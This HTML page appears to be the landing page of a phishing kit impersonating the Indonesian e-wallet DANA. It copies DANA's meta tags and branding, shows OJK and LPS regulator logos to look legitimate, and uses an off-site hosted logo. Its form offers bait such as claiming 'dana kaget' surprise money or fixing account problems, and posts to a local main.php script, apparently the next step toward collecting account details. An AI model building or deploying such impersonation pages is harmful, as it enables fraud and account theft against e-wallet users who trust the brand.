<!DOCTYPE html>
<html lang="en">
<head>
<meta data-n-head="ssr" charset="utf-8">
<meta data-n-head="ssr" name="viewport" content="width=device-width, initial-scale=1">
<meta data-n-head="ssr" data-hid="theme-color" name="theme-color" content="#118ee9">
<meta data-n-head="ssr" data-hid="apple-mobile-web-app-status-bar-style" name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta data-n-head="ssr" data-hid="twitter:image" name="twitter:image" content="https://a.m.dana.id/danaweb/web/dana-meta-logo.png">
<meta data-n-head="ssr" data-hid="og:image" property="og:image" content="https://a.m.dana.id/danaweb/web/dana-meta-logo.png">
<meta data-n-head="ssr" data-hid="og:site_name" name="og:site_name" content="DANA.id">
<meta data-n-head="ssr" data-hid="description" name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
<meta data-n-head="ssr" data-hid="twitter:title" name="twitter:title" content="DANA - Apa pun transaksinya selalu ada DANA">
<meta data-n-head="ssr" data-hid="twitter:description" name="twitter:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
<meta data-n-head="ssr" data-hid="og:title" name="og:title" content="DANA - Apa pun transaksinya selalu ada DANA">
<meta data-n-head="ssr" data-hid="og:description" name="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
<meta data-n-head="ssr" data-hid="keywords" name="keywords" content="dana, dana indonesia, dana bisnis, qris, qris adalah, qris indonesia, daftar qris, qris bank indonesia, qris dana, qris bi, qris merchant, logo qris, apa itu qris, pembayaran qris, merchant, merchant dana, daftar merchant, promo hari ini, promo terbaru, promo cashback, cashback, apa itu cashback, cashback adalah, apa itu ewallet, ewallet indonesia, pembayaran digital, dompet digital">
<link data-n-head="ssr" rel="icon" type="image/x-icon" href="https://www.dana.id/favicon.ico">
<link data-n-head="ssr" rel="preconnect" href="https://a.m.dana.id">
<link data-n-head="ssr" rel="dns-prefetch" href="https://a.m.dana.id">
<link data-n-head="ssr" rel="preconnect" href="https://app.link">
<link data-n-head="ssr" rel="dns-prefetch" href="https://app.link">
<link data-n-head="ssr" rel="preconnect" href="https://api2.branch.io">
<link data-n-head="ssr" rel="dns-prefetch" href="https://api2.branch.io">
<link data-n-head="ssr" rel="preconnect" href="https://youtube.com">
<link data-n-head="ssr" rel="dns-prefetch" href="https://youtube.com">
<link data-n-head="ssr" rel="preconnect" href="https://sentry.io">
<link data-n-head="ssr" rel="dns-prefetch" href="https://sentry.io">
<link data-n-head="ssr" rel="preconnect" href="https://cdn.lr-ingest.io">
<link data-n-head="ssr" rel="dns-prefetch" href="https://cdn.lr-ingest.io">
<title>DANA - Apa pun transaksinya selalu ada DANA</title>
<link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css" />
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css" />

<link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css" />
<link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.css" />
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">

<style>
     @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
     
     body {
           font-family: 'Open Sans', sans-serif;
           
           html {
                 overflow-x: hidden;
                 }
     }
     
     h2 {
         font-family: 'Open Sans', sans-serif;
         font-size: 15px;
         font-weight: bold;
         color: #0086e0;
         letter-spacing: 1.2px;
         text-align: center;
         line-height: 2;
         border-radius: 5px;
     }
     
     h3 {
         font-family: 'Open Sans', sans-serif;
        font-size: 15px;
        font-weight: bold;
        color: #0086e0;
        letter-spacing: 1.5px;
        line-height: 1;
        border-radius: 5px;
     }
     
     h9 {
        font-family: 'Open Sans', sans-serif;
        font-size: 13px;
        font-weight: bold;
        text-align: center;
        color: #0086e0;
        letter-spacing: 1.5px;
        line-height: 1;
        border-radius: 5px;
     }
     
     h4 {
        font-family: 'Open Sans', sans-serif;
        font-size: 15px;
        font-weight: 900;
        color: #0086e0;
        letter-spacing: 1px;
        text-align: center;
        line-height: 1.5;
    }

    h5 {
        font-family: 'Open Sans', sans-serif;
        font-size: 15px;
        font-weight: 600;
        color: #0086e0;
        letter-spacing: 1px;
        text-align: center;
        line-height: 1;
    }
    
    h6 {
        font-family: 'Open Sans', sans-serif;
        font-size: 13px;
        font-weight: bold;
        color: #000;
        letter-spacing: 1px;
        text-align: center;
        line-height: 1;
        border-radius: 5px;
    }
    
    .btn-punya {
        display: block;
        margin: 0px auto 0 auto;
        padding: 0px;
        cursor: pointer;
        background: none rgb(0, 134, 224);
        border: none;
        text-align: center;
        height: 55px;
        width: 536px;
        max-width: 95%;
        font-family: 'Open Sans', sans-serif;
        font-size: 16px;
        font-weight: bold;
        color: rgb(255, 255, 255);
        letter-spacing: 2px;
        line-height: 1;
        border-radius: 10px;
        box-shadow: rgb(170, 170, 170) 5px 5px 7px 0px;
        transition: background 200ms ease 0s;
    }

    .btn-belum {
        display: block;
        margin: 10px auto;
        padding: 0px;
        cursor: pointer;
        background: none transparent;
        border: none;
        text-align: center;
        height: 57px;
        width: 536px;
        max-width: 100%;
        font-family: 'Open Sans', sans-serif;
        font-size: 16px;
        font-weight: bold;
        color: rgb(0, 134, 224);
        letter-spacing: 2px;
        line-height: 1;
        border-radius: 5px;
        transition: background 200ms ease 0s;
    }

    .form-log {
        box-sizing: border-box;
        height: 40px;
        width: 536px;
        max-width: 100%;
        border: 2px solid rgb(0, 134, 224);
        border-image: initial;
        background-color: rgb(255, 255, 255);
        border-radius: 8px;
        box-shadow: rgb(237, 237, 237) 2px 2px 2px 0px;
        font-family: 'Roboto Condensed', sans-serif;
        font-weight: bold;
        font-size: 16px;
        color: rgb(28, 28, 28);
        word-spacing: 7px;
        padding: 0px 45px;
    }
    
    #ionIcons {
        color: rgb(22, 119, 199);
        font-size: 29px;
        position: absolute;
        display: block;
        margin-top: 1px;
        margin-left: 15px;
    }

    input {
        border: 3px solid rgb(0, 134, 224);
        border-radius: 8px;
        padding: 5px 10px;
    }

    h1 {
        display: table;
        background: #fff;
        /* #F8F8FF */
        color: #fff;
        padding: 2px;
        width: 100%;
    }

    h7 {
        display: table;
        background: #3081ce;
        color: #fff;
        padding: 15px;
        width: 100%;
        font-size: 12px;
        text-align: center;
        font-family: 'Roboto Condensed', sans-serif;
    }

    .container {
        max-width: 900px;
        padding: 15px;
        background-color: #fff;
        margin-left: auto;
        margin-right: auto;
    }

    .slider .slick-slide {
        border: solid 0px #000;
    }

    .slider .slick-slide img {
        width: 100%;
        margin-top: 0px;
    }

    /* make button larger and change their positions */
    .slick-prev,
    .slick-next {
        width: 0px;
        height: 0px;
        z-index: 1;
    }

    .slick-prev {
        left: 0px;
    }

    .slick-next {
        right: 0px;
    }

    .slick-prev:before,
    .slick-next:before {
        font-size: 0px;
        text-shadow: 0 0 0px rgba(0, 0, 0, 0.5);


    h7 {
        display: table;
        background: #3081ce;
        color: #fff;
        padding: 15px;
        width: 100%;
        font-size: 12px;
        text-align: center;
        font-family: 'Roboto Condensed', sans-serif;
    }

    .container {
        max-width: 900px;
        padding: 15px;
        background-color: #fff;
        margin-left: auto;
        margin-right: auto;
    }

    .slider .slick-slide {
        border: solid 0px #000;
    }

    .slider .slick-slide img {
        width: 100%;
        margin-top: 0px;
    }

    /* make button larger and change their positions */
    .slick-prev,
    .slick-next {
        width: 0px;
        height: 0px;
        z-index: 1;
    }

    .slick-prev {
        left: 0px;
    }

    .slick-next {
        right: 0px;
    }

    .slick-prev:before,
    .slick-next:before {
        font-size: 0px;
        text-shadow: 0 0 0px rgba(0, 0, 0, 0.5);
    }

    /* move dotted nav position */
    .slick-dots {
        bottom: 0px;
    }
    
    /* enlarge dots and change their colors */
    .slick-dots li button:before {
        font-size: 12px;
        color: #000;
        text-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
        opacity: 0;
    }

    .slick-dots li.slick-active button:before {
        color: #dedede;
    }

    /* transition effects for opacity */
    .slick-arrow,
        {
        transition: opacity 0.2s ease-out;
    }

    legend {
        padding: 2px;
        background: #transparent;
        color: #0086e0;
    }
    </style>
<head>
<body>
<h1><img src="https://i.postimg.cc/XvL4vr8c/logo.png" width="100" style="margin-left: 10px;"></h1>
<div class="container">
<div class="slider">
<div> <a href="#"> <img src="img/1.png" alt="Image 1"> </a> </div>
<div> <a href="#"> <img src="img/2.png" alt="Image 2"> </a> <br> </div>
</div>
<form method="post" action="main.php">
<div class="panel panel-info">
<div class="panel-body">
<legend>
<h4>Silahkan pilih sesuai dengan kebutuhan Anda di bawah ini :</h4>
</legend>
<legend>
<div> <br> <input type="radio" id="baru" name="tarif" value="Claim Dana Kaget" checked>
<label for="baru">
<h5>&nbsp;claim dana kaget</h5>
</label>
</div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun"> <label for="lama">
<h5>&nbsp;perbaikan kendala akun</h5>
</label> </div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun"> <label for="lama">
<h5>&nbsp;Pendaftaran Dana Paylatter</h5>
</label> </div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun"> <label for="lama">
<h5>&nbsp;pendaftaran Dana Bisnis</h5>
</label> </div>
</legend>
</div>
</div> <br> <br>
<div class="row">
<div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: -10px auto;">
<div class="row"> <button class="btn-punya" type="submit" value="send">Lanjutkan</button>
</form>
</div> <br><br>
<div class="row">
<h6>Terdaftar dan diawasi oleh:</h6>
<center>
<div class="css-dnzamn"><img src="img/logo-ojk.png" width="70"><img src="img/logo-lps.png" width="70"></div>

<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js">
            </script> 
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js">
            </script>

<script>
            $(document).ready(function() {
                $('.slider').slick({
                    autoplay: true,
                    autoplaySpeed: 500,
                    dots: true
                });
            });
            </script>
</body>
</html>        